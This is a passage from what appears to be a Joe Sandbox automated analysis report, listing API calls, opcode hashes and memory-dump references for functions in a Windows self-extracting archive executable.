                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                          • Opcode ID: 91757ecb53331e7411944902da0197abf02879f79ca40837da120f10be38b075
                                                                                                                                          • Instruction ID: 7c02bd3fe3e356e96f35f4d0c0b83654b6f65b245336f3cb1e17073e8125b237
                                                                                                                                          • Opcode Fuzzy Hash: 91757ecb53331e7411944902da0197abf02879f79ca40837da120f10be38b075
                                                                                                                                          • Instruction Fuzzy Hash: 5101D8331183116DF6192AF47D8DA5A7B99FB117F47604739F9A0554E0EFE24C409244
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetLastError.KERNEL32(?,00121098,00104674,00121098,?,?,001040EF,?,?,00121098), ref: 001097E9
                                                                                                                                          • _free.LIBCMT ref: 0010981C
                                                                                                                                          • _free.LIBCMT ref: 00109844
                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00121098), ref: 00109851
                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00121098), ref: 0010985D
                                                                                                                                          • _abort.LIBCMT ref: 00109863
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                          • Opcode ID: 4ca35b4ff6de4994d1e8dacfc2e1d4ffd724c686877faf1f4d989bf8056de009
                                                                                                                                          • Instruction ID: 7d7bd6a994bc18b0db7cfae7f1dcf0a896d78ff18d5c00843459761bd279897c
                                                                                                                                          • Opcode Fuzzy Hash: 4ca35b4ff6de4994d1e8dacfc2e1d4ffd724c686877faf1f4d989bf8056de009
                                                                                                                                          • Instruction Fuzzy Hash: FFF0283514470567C61A3374BD2AA5B3AA98FF2B70F21C225F9E8A27E7FFF088414165
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • WaitForSingleObject.KERNEL32(?,0000000A), ref: 000FDC47
                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000FDC61
                                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000FDC72
                                                                                                                                          • TranslateMessage.USER32(?), ref: 000FDC7C
                                                                                                                                          • DispatchMessageW.USER32(?), ref: 000FDC86
                                                                                                                                          • WaitForSingleObject.KERNEL32(?,0000000A), ref: 000FDC91
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2148572870-0
                                                                                                                                          • Opcode ID: b2a2371c052a5d2842f10a6c947bd9d172df559e4b5abc101116efd59b694eb4
                                                                                                                                          • Instruction ID: 273424b5fc4fe1794347b463ec9300c194e7b9ec946445c77bd07f8bc26cdaf5
                                                                                                                                          • Opcode Fuzzy Hash: b2a2371c052a5d2842f10a6c947bd9d172df559e4b5abc101116efd59b694eb4
                                                                                                                                          • Instruction Fuzzy Hash: 9FF0AF32A00229BBCB206BA1ED0CDDF7FBDEF42791B004121F61AD2420D634C686C7B0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 000F05DA: _wcslen.LIBCMT ref: 000F05E0
                                                                                                                                            • Part of subcall function 000EB92D: _wcsrchr.LIBVCRUNTIME ref: 000EB944
                                                                                                                                          • _wcslen.LIBCMT ref: 000EC197
                                                                                                                                          • _wcslen.LIBCMT ref: 000EC1DF
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _wcslen$_wcsrchr
                                                                                                                                          • String ID: .exe$.rar$.sfx
                                                                                                                                          • API String ID: 3513545583-31770016
                                                                                                                                          • Opcode ID: f61dc3b62e36bac90e50ef30336f404ecfb1ebcee836d6e041f946742ad48921
                                                                                                                                          • Instruction ID: c90434197d368a29fa45199fce87c72975a29f6423544e06501c5e9ea93f7a50
                                                                                                                                          • Opcode Fuzzy Hash: f61dc3b62e36bac90e50ef30336f404ecfb1ebcee836d6e041f946742ad48921
                                                                                                                                          • Instruction Fuzzy Hash: 914125216003D59DE735AF258802EBBB3E8EF42744F10094EF9917B082EB625D82D351
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetTempPathW.KERNEL32(00000800,?), ref: 000FCE9D
                                                                                                                                            • Part of subcall function 000EB690: _wcslen.LIBCMT ref: 000EB696
                                                                                                                                          • _swprintf.LIBCMT ref: 000FCED1
                                                                                                                                            • Part of subcall function 000E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000E40A5
                                                                                                                                          • SetDlgItemTextW.USER32(?,00000066,0012946A), ref: 000FCEF1
                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 000FCFFE
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                                                                          • String ID: %s%s%u
                                                                                                                                          • API String ID: 110358324-1360425832
                                                                                                                                          • Opcode ID: 6b3ca35602409f63efea91d481814966177353220e172497e293d373b6da7b0f
                                                                                                                                          • Instruction ID: a5927a7fe389274d76de989b363e07acf8221a412b5d159b8c87675e5724d95d
                                                                                                                                          • Opcode Fuzzy Hash: 6b3ca35602409f63efea91d481814966177353220e172497e293d373b6da7b0f
                                                                                                                                          • Instruction Fuzzy Hash: 4B4190B190025DAADF249B90DD45EFE77FDEB05300F4080A6FB09E7441EA708A849F61
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • _wcslen.LIBCMT ref: 000EBB27
                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,000EA275,?,?,00000800,?,000EA23A,?,000E755C), ref: 000EBBC5
                                                                                                                                          • _wcslen.LIBCMT ref: 000EBC3B
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _wcslen$CurrentDirectory
                                                                                                                                          • String ID: UNC$\\?\
                                                                                                                                          • API String ID: 3341907918-253988292
                                                                                                                                          • Opcode ID: e6c16dceba835bb12ac4fea04eb23004ddac20c20d10b55373512cc2016290d1
                                                                                                                                          • Instruction ID: 8b9b763baefd1ca7a273b47828494c3699239ea51aac35fd055c667f396956ed
                                                                                                                                          • Opcode Fuzzy Hash: e6c16dceba835bb12ac4fea04eb23004ddac20c20d10b55373512cc2016290d1
                                                                                                                                          • Instruction Fuzzy Hash: 8041B631404299AECF21AF62CC41EEF77B9AF45394F204566F954B3152EBB0EE90DA50
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • LoadBitmapW.USER32(00000065), ref: 000FB6ED
                                                                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 000FB712
                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 000FB744
                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 000FB767
                                                                                                                                            • Part of subcall function 000FA6C2: FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,000FB73D,00000066), ref: 000FA6D5
                                                                                                                                            • Part of subcall function 000FA6C2: SizeofResource.KERNEL32(00000000,?,?,?,000FB73D,00000066), ref: 000FA6EC
                                                                                                                                            • Part of subcall function 000FA6C2: LoadResource.KERNEL32(00000000,?,?,?,000FB73D,00000066), ref: 000FA703
                                                                                                                                            • Part of subcall function 000FA6C2: LockResource.KERNEL32(00000000,?,?,?,000FB73D,00000066), ref: 000FA712
                                                                                                                                            • Part of subcall function 000FA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,000FB73D,00000066), ref: 000FA72D
                                                                                                                                            • Part of subcall function 000FA6C2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,000FB73D,00000066), ref: 000FA73E
                                                                                                                                            • Part of subcall function 000FA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 000FA7A7
                                                                                                                                            • Part of subcall function 000FA6C2: GlobalUnlock.KERNEL32(00000000), ref: 000FA7C6
                                                                                                                                            • Part of subcall function 000FA6C2: GlobalFree.KERNEL32(00000000), ref: 000FA7CD
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                                                                                                          • String ID: ]
                                                                                                                                          • API String ID: 1428510222-3352871620
                                                                                                                                          • Opcode ID: f5e4c9e51a51755ddb65d3273647b463b9cff31ff8e8ebad66d37e034ff6fe61
                                                                                                                                          • Instruction ID: c9ae8c8d6c96fb94348bb50ddfa2dc251e003fe4dd71a571c4b4f0c855c538ac
                                                                                                                                          • Opcode Fuzzy Hash: f5e4c9e51a51755ddb65d3273647b463b9cff31ff8e8ebad66d37e034ff6fe61
                                                                                                                                          • Instruction Fuzzy Hash: 15014976600319A7C712B774CC09ABF7AB99FC2B62F140011FB14E7AA2DF318D056A61
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 000E1316: GetDlgItem.USER32(00000000,00003021), ref: 000E135A
                                                                                                                                            • Part of subcall function 000E1316: SetWindowTextW.USER32(00000000,001135F4), ref: 000E1370
                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 000FD64B
                                                                                                                                          • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 000FD661
                                                                                                                                          • SetDlgItemTextW.USER32(?,00000066,?), ref: 000FD675
                                                                                                                                          • SetDlgItemTextW.USER32(?,00000068), ref: 000FD684
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ItemText$DialogWindow
                                                                                                                                          • String ID: RENAMEDLG
                                                                                                                                          • API String ID: 445417207-3299779563
                                                                                                                                          • Opcode ID: e843be0e68c33f557cce29436724289459df5cec9d2fc9cb4c8c038bc8c3f341
                                                                                                                                          • Instruction ID: 40db775f3cde794dcee30e595cc6828797fefd6f9f3c98cf88318340c2fd8307
                                                                                                                                          • Opcode Fuzzy Hash: e843be0e68c33f557cce29436724289459df5cec9d2fc9cb4c8c038bc8c3f341
                                                                                                                                          • Instruction Fuzzy Hash: 54012833685218BAD2208F649D09FBB779EEB9BB01F110116F305E28E0C7A29945B775
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00107E24,?,?,00107DC4,?,0011C300,0000000C,00107F1B,?,00000002), ref: 00107E93
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00107EA6
                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00107E24,?,?,00107DC4,?,0011C300,0000000C,00107F1B,?,00000002,00000000), ref: 00107EC9
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                          • Opcode ID: f3f5a2d19ea357f6db4e0f77f45e54853c2538f860884b5644dcb99fea111dab
                                                                                                                                          • Instruction ID: dfc07d9d2747c7f9b4554ff115fc9d56679dbda11875a68b212895b57915430c
                                                                                                                                          • Opcode Fuzzy Hash: f3f5a2d19ea357f6db4e0f77f45e54853c2538f860884b5644dcb99fea111dab
                                                                                                                                          • Instruction Fuzzy Hash: F6F06831A0521CBBDB199FA0DD09BEEBFB5EF44711F0080A9F815A2594DB759E81CB90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AdjustPointer$_abort
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2252061734-0
                                                                                                                                          • Opcode ID: 326efd291d7dfedb633c1d6922063c89128e17e47a761cbfe39aa8ac1b43297b
                                                                                                                                          • Instruction ID: 0f428cf145d91883ecba720fc4efeb93cae69474f8adfa77c705b6922b2d9acc
                                                                                                                                          • Opcode Fuzzy Hash: 326efd291d7dfedb633c1d6922063c89128e17e47a761cbfe39aa8ac1b43297b
                                                                                                                                          • Instruction Fuzzy Hash: 1151E571600212AFEB298F54D989BBAB7A4FF64310F24452EEC85476E1E7F1ED80D790
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0010BF39
                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0010BF5C
                                                                                                                                            • Part of subcall function 00108E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00104286,?,0000015D,?,?,?,?,00105762,000000FF,00000000,?,?), ref: 00108E38
                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0010BF82
                                                                                                                                          • _free.LIBCMT ref: 0010BF95
                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0010BFA4
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 336800556-0
                                                                                                                                          • Opcode ID: ca079e28fab10c868b542a64f3071955c5cf5524851249579619a41656fcf438
                                                                                                                                          • Instruction ID: fe88545c895d61d7cdbcfa3d83d8c411669ece04314bd50200129865db0c68e2
                                                                                                                                          • Opcode Fuzzy Hash: ca079e28fab10c868b542a64f3071955c5cf5524851249579619a41656fcf438
                                                                                                                                          • Instruction Fuzzy Hash: 8D01F7726092167FA72516B65CCCCBB6A6DDFC2BA03154129F984C3285EFA0CD0285B0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetLastError.KERNEL32(?,?,?,001091AD,0010B188,?,00109813,00000001,00000364,?,001040EF,?,?,00121098), ref: 0010986E
                                                                                                                                          • _free.LIBCMT ref: 001098A3
                                                                                                                                          • _free.LIBCMT ref: 001098CA
                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00121098), ref: 001098D7
                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00121098), ref: 001098E0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                          • Opcode ID: a03a4855298f5b3d3950f9e3053f2f829227061c1e7acf1bd984517ce617751c
                                                                                                                                          • Instruction ID: 5b1b40aa856b0af0fc1a278f571b82c591ea1d5622deed73056727b490ebf1d6
                                                                                                                                          • Opcode Fuzzy Hash: a03a4855298f5b3d3950f9e3053f2f829227061c1e7acf1bd984517ce617751c
                                                                                                                                          • Instruction Fuzzy Hash: 280144321056096BD21A3374ADA595B26A9DFE27B07228236F9E5A23D3FFF08C014261
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 000F11CF: ResetEvent.KERNEL32(?), ref: 000F11E1
                                                                                                                                            • Part of subcall function 000F11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 000F11F5
                                                                                                                                          • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 000F0F21
                                                                                                                                          • CloseHandle.KERNEL32(?,?), ref: 000F0F3B
                                                                                                                                          • DeleteCriticalSection.KERNEL32(?), ref: 000F0F54
                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 000F0F60
                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 000F0F6C
                                                                                                                                            • Part of subcall function 000F0FE4: WaitForSingleObject.KERNEL32(?,000000FF,000F1101,?,?,000F117F,?,?,?,?,?,000F1169), ref: 000F0FEA
                                                                                                                                            • Part of subcall function 000F0FE4: GetLastError.KERNEL32(?,?,000F117F,?,?,?,?,?,000F1169), ref: 000F0FF6
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1868215902-0
                                                                                                                                          • Opcode ID: 684bbf552699275223d1122174a2f09d391f75d2f7660186e5c7d6ccad955157
                                                                                                                                          • Instruction ID: 4fb273949dbba4a7c69fb4fce1589a393696f45210ea12fe9fac7cd54fb485d8
                                                                                                                                          • Opcode Fuzzy Hash: 684bbf552699275223d1122174a2f09d391f75d2f7660186e5c7d6ccad955157
                                                                                                                                          • Instruction Fuzzy Hash: 1601B571100744EFC7269B64DD84BC6FBE9FB08710F004929F26B92961C7717A84DB50
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • _free.LIBCMT ref: 0010C817
                                                                                                                                            • Part of subcall function 00108DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0010C896,?,00000000,?,00000000,?,0010C8BD,?,00000007,?,?,0010CCBA,?), ref: 00108DE2
